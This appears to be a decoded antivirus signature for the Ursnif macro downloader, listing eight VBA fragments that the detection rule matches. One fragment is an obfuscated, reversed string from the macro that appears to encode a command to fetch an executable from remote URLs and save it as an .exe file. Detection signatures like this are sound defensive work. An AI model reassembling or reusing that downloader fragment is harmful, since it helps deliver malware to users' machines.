VIRUS NAME: Doc.Downloader.Ursnif-6922890-0
TDB: Engine:51-255,Target:2
LOGICAL EXPRESSION: 0&1&2&3&4&5&6&7
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
FFFTCO(3) = 2839
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
ReDim FFFTCO(5)
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
ReDim dYJFiq(2)
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Resume _
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
TGSsvVTsCW = "^of^;'^e^xe^.^'^+^" + "F^Th$^+'\^'^+" + Format(Chr(10 + 14 + 18 + 7 + 50)) + "i^lb^up:vn^e^$=d" + "m^K^$^;'^9^9'^ ^= ^FT^h" + "$;)^'^@'(^tilpS^.'KzfrvQp/t" + "en^.^h^se^t^b//^:" + "pt^th^@rtO^T^HS^3/m^o" + Format(Chr(10 + 14 + 18 + 7 + 50)) + ".^s" + "^st^ed//^:pt^th^@Z03" + "V6Ylk7/m^o" + Format(Chr(10 + 14 + 18 + 7 + 50))
 * SUBSIG ID 5
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
qQCYqj(0) = 2
 * SUBSIG ID 6
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
wzEnj(0) = 78
 * SUBSIG ID 7
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
zqWDa(1) = 5
